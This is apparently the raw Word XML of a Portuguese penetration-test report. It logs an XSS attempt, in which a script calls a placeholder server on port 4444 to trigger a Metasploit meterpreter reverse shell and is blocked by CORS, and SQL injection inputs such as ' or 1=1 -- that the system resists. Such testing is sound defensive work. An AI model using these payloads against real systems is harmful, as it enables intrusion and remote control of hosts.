      <w:proofErr w:type="gramEnd"/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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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Explorar XSS – Tela Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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27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2 hora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xplorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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na Iteração 3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</w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82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 partir da máquina virtual que usa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Kali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Linux, abrir uma conexão do </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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fazendo uso de um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acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602EF" w:rsidP="00AC10DC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315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ab/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Passos</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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través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isponível em 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Multi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>Handler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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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usar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abrir um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porta 444 da máquina virtual que usa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Kali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Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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sar um comando GET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abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que us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Kali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porta indicad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Dessa forma, será criado um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que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa 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payload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carregado no momento, que no caso é o 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windows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reverse_tc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que abre uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5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81DA5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e inicia uma chamada Ajax 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dotipo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GET par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porta 4444 de forma assíncrona. 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00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve">); 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r.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET"</w:t>
      </w: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,’http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="2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color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>();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8B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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w: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</w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Espera-se que a sessão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ão seja Aberta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02EF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sultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"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O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75"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tab/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4CA4C8A4" wp14:editId="68B21A6F">
            <wp:extent cx="5400040" cy="1464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24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– Erro exibido no navegador na execução da requisição usando o filtro de CORS.</w:t>
      </w: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2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Rodar o mesmo script utilizado n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1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em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas n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ceweasel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D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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Espera-se que a sessão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ão seja aber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sultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"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Ao utilizar o navegador Firefox, o filtro de CORS impede a conex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13AD12E2" wp14:editId="71BA138F">
            <wp:extent cx="5400040" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="25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25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– Navegador Firefox impede a conexão quando o filtro de CORS é utiliza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Tela Cadastro Servidor – Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Injection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Tarefa realizada dia 26/04/16.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 e 30 minut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Submeter entradas </w:t>
      </w:r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 xml:space="preserve">maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor n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e forçar ações não autorizadas no sistema</w:t>
      </w:r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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simple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46D4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sistema realiz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o tratamento do caractere aspa simples como um parâmetro regular da consul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ntrada: teste ‘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 A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “</w:t>
      </w:r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”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2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Inserir um texto com uma distribuição adequada de aspa simples e comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários cadastrados. Comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserid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ntrada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F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1 --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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B846D4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846D4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B846D4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spera-se que o sistema realize o tratamento dos caracteres para impedir que os comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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sejam interpretados como parte da consult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3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É possível que a tela utilize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, o funcionamento do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">no browser em utilização. Após isso foram repetidos os procedimentos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">das </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s 1 e 2.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Entradas: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15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘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15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ or 1=1 --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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘ or 1=1 #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B846D4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B846D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spera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta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B846D4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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 xml:space="preserve">. Nada aconteceu. Com o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Javascript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desabilitado no navegador a página não realizou nenhuma requisição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4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Com a função de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript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habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções SQL no campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entradas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1231 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; --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 xml:space="preserve">); select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; #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8C6DC7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8C6DC7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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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>. Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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>” o seguinte erro foi exibido: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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
